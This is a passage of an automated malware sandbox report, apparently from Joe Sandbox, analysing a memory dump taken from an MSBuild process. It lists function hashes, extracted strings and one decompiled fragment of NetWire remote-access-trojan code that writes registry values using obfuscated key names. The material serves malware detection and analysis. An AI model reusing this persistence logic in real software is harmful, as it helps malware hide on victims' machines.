                        • Instruction Fuzzy Hash: 9761DEB44087109FD710AF26C584A6BBBF4BF88704F01892EE8D897391E7799985CF56
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00413A85 Relevance: 5.2, Strings: 4, Instructions: 151COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %d:%I64u:%s%s;$%d:%s%s;$%s%s\$%s*
                        • API String ID: 0-525976846
                        • Opcode ID: 334888fa3b4434e061fa7b69daef3cafc177c312af5b0b50911e5eeb64500dc7
                        • Instruction ID: f6b2b9afb8f28ceff06ae1ca88c29ba9ed65548566ee5afaf2077295461a783a
                        • Opcode Fuzzy Hash: 334888fa3b4434e061fa7b69daef3cafc177c312af5b0b50911e5eeb64500dc7
                        • Instruction Fuzzy Hash: 0971AFB44093459BD320EF6AD18469FBBE0AF84758F008E1EE4D887391D7B89689CF57
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00420700 Relevance: 5.1, Strings: 4, Instructions: 131COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ../nettle-3.5.1/memxor3.c$M$n == 1$n > 0
                        • API String ID: 0-17687075
                        • Opcode ID: 389ade0749032fac037805b9abc3480a8171c3f13d13cda5c72ac285551c0497
                        • Instruction ID: 88b4d72e3a3b074a803e33dc480ae7ecbd49f2114936249b734713bf6416a905
                        • Opcode Fuzzy Hash: 389ade0749032fac037805b9abc3480a8171c3f13d13cda5c72ac285551c0497
                        • Instruction Fuzzy Hash: 0951BB716083A28FC300CF28E59052BBBF1BFCA310F048A1EE69087645D335EA19CF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040B34D Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %s\%s$lWk67i45dN.Sii$lWkQ54i6.Sii$lWkniQd.Sii
                        • API String ID: 0-1446494701
                        • Opcode ID: 11b24af2d9943bdd585289004bbed1b8b93da4e2fff93dd0614d11004ba5693e
                        • Instruction ID: 99cae675b6ce9c0e2fecfda939a24821795d6923156f602411de4cd21c6c0224
                        • Opcode Fuzzy Hash: 11b24af2d9943bdd585289004bbed1b8b93da4e2fff93dd0614d11004ba5693e
                        • Instruction Fuzzy Hash: D1414BB05083459AC710EF25D58426EBBE0EF91348F41982FE4D8AB382D77D9655CB4F
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040A2C3 Relevance: 5.1, Strings: 4, Instructions: 62COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $ $@$Password
                        • API String ID: 0-2841454644
                        • Opcode ID: 246fdc29b333a0ea924cba9d3f13c81f6e5188126dcc5c7f772fd54f0c83ee0b
                        • Instruction ID: 5ee87fdfff2276ed8f5c7cc8756256179826899119173577a518fef8d5e42c6b
                        • Opcode Fuzzy Hash: 246fdc29b333a0ea924cba9d3f13c81f6e5188126dcc5c7f772fd54f0c83ee0b
                        • Instruction Fuzzy Hash: 2421EFB0509314AED310AF52D58879BBBE4BF85348F408C2EE4C857281D7B985899BAB
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004089ED Relevance: 5.0, Strings: 4, Instructions: 40COMMON
                        Download Yara Rule
                        C-Code - Quality: 18%
                        			E004089ED(void* __ecx, void* __edx, void* __eflags) {
				char _v528;
				char* _v548;
				char* _v552;
				void* _t9;
				void* _t10;
				char* _t15;
				char* _t16;
				char* _t18;
				void* _t20;
				void* _t21;
				char** _t22;

				_t21 = __edx;
				_t20 = __ecx;
				 *_t22 = 8;
				_t9 = E004082E8(__eflags);
				_t24 = _t9;
				if(_t9 != 0) {
					 *_t22 = "MT_qUDrj\\F4Y0W6W85\\U4RSWg6\\PQ00dR5zd064WR\\rQR\\";
					_t18 = E004081AA();
					_v548 = 0x4224c8;
					_v552 = _t18;
					 *_t22 = 0x80000001;
					E00410803(_t20, _t21);
				}
				 *_t22 = 0x10;
				_t10 = E004082E8(_t24);
				_t25 = _t10;
				if(_t10 != 0) {
					 *_t22 = "MT_qUDrj\\F4Y0W6W85\\DY542d Md5Qs\\XR65CiidS PWlsWRdR56";
					_t16 = E004081AA();
					_v548 = 0x4224a0;
					_v552 = _t16;
					 *_t22 = 0x80000002;
					E0041086B(_t20);
				}
				 *_t22 = 4;
				if(E004082E8(_t25) != 0) {
					_t15 =  *0x42b460;
					if(_t15 != 0) {
						 *_t22 = _t15;
						L0041F78C();
					}
				}
				_v548 = "NetWire";
				_v552 = "SOFTWARE\\";
				 *_t22 = 0x80000001;
				E0041086B(_t20);
				_v552 = 0x204;
				 *_t22 =  &_v528;
				return E00407C77( &_v528);
			}














                        0x004089ed
                        0x004089ed
                        0x004089f3
                        0x004089fa
                        0x004089ff
                        0x00408a01
                        0x00408a03
                        0x00408a0a
                        0x00408a0f
                        0x00408a17
                        0x00408a1b
                        0x00408a22
                        0x00408a22
                        0x00408a27
                        0x00408a2e
                        0x00408a33
                        0x00408a35
                        0x00408a37
                        0x00408a3e
                        0x00408a43
                        0x00408a4b
                        0x00408a4f
                        0x00408a56
                        0x00408a56
                        0x00408a5b
                        0x00408a69
                        0x00408a6b
                        0x00408a72
                        0x00408a74
                        0x00408a77
                        0x00408a77
                        0x00408a72
                        0x00408a7c
                        0x00408a84
                        0x00408a8c
                        0x00408a93
                        0x00408a9c
                        0x00408aa4
                        0x00408ab2

                        Strings
                        • MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56, xrefs: 00408A37
                        • SOFTWARE\, xrefs: 00408A84
                        • NetWire, xrefs: 00408A7C
                        • MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\, xrefs: 00408A03
                        Memory Dump Source
                        • Source File: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_28_2_400000_MSBuild.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56$MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\$NetWire$SOFTWARE\
                        • API String ID: 0-126448098
                        • Opcode ID: e80744430c769008ed9aa6cab13524ccc618e940c92f136a1cd14b05883cfc76
                        • Instruction ID: bb4ce6ad198e61c342c208a9868e2ee3a63cf1cfb8a338f91740164746fe8c6d
                        • Opcode Fuzzy Hash: e80744430c769008ed9aa6cab13524ccc618e940c92f136a1cd14b05883cfc76
                        • Instruction Fuzzy Hash: 1101B7B06087119AD700BF65D64526DBBE0AF40348F81C82FE4C86B286DBBD8485DB5F
                        Uniqueness

                        Uniqueness Score: -1.00%